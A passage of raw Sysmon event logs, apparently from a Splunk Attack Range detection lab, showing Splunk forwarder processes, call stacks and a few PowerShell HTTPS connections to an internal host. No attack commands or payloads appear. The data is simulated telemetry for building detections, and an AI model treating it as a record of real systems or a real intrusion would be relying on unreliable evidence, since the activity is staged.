Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.879{B81B27B7-A001-6140-6456-04000000C801}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75E7FB8E67C155D08032B10F78615890,SHA256=86AB84D143F0853136DC9FD1E3DF3D9C1754AE7D443E50A0E4FC6CACF3D342FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.944{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C44DD6E2696240D5B32223A1074592E0,SHA256=9FDA52AF63850B1AA92023348C2789E45802F8BCFF5F3956B46CCBBD65864095,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.944{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECD7D06F96EC7962B25374BEC5C9B9D3,SHA256=159AB0457DA79A986AD1464305B2103DECFBF8B173A3FED75DA54CDF5E69A4CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.759{B81B27B7-A002-6140-6556-04000000C801}58885388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.728{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B03493E7EC6FF3B64C58DEA10C201B6E,SHA256=820D44C83221D111D08E8ACF6729DA6BA4C189826F0649A255B00B8D9A0DE18F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A002-6140-6556-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A002-6140-6556-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.579{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A002-6140-6556-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.564{B81B27B7-A002-6140-6556-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2378733D7C594767F58E530784B70F06,SHA256=8A21E2B85E06E45DDFD9C0D7E951C5F2D0EB27699770FF530F9B32CC66C27172,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:38.046{B81B27B7-A001-6140-6456-04000000C801}60006524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E51AC98B760D90AA1F25583876E682,SHA256=371FC5AECDCD822158BE8BC8054CBDE54BCB5550F0C214DE1DD3BF115901B31F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.390{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50446-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.260{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:40.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D54069ED57B1900E59529C3172849B,SHA256=D1E644F306E1C8105E50EFA7B4B28FB226AEF270DF4C65B9B7A019A037F45565,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:40.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C44DD6E2696240D5B32223A1074592E0,SHA256=9FDA52AF63850B1AA92023348C2789E45802F8BCFF5F3956B46CCBBD65864095,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:41.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2388EB727913EA2D1FFB77E811E3E6B5,SHA256=796FC067CB3F25CCCFC33444B4A64C0BACEDE7E0AEC282F270BC8445C2F044D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:10.855{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50447-false10.0.1.12-8000- 23542300x800000000000000036496738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:42.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A466B7F0EA5FD0492F402754F9E471E,SHA256=5CEAB283ECC7F10618A8A53B847C7C341B5ACB6A1AD1E2DEE32B5C88222FC044,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:42.601{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE8EFA04FB6FA89EB27938469177981,SHA256=95806EA34F81C4431C47D03E0FF6582193FC9C2E9117C41AA1A72D0AA85A3CF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:43.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502372EDC3A8B997639561C12CBDDDBC,SHA256=1BD2308882E746756C4CD07D627F6FFBF1EEF1775F3A2FA29954CC32543F7A38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:13.401{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50448-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:44.637{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3BAF4DCB09824221A7D15E470C02113,SHA256=FE6780BC2DFFAE29625F8BBFA8715A0A4D512D5FD9902DB122FBBC3283A151B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:45.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 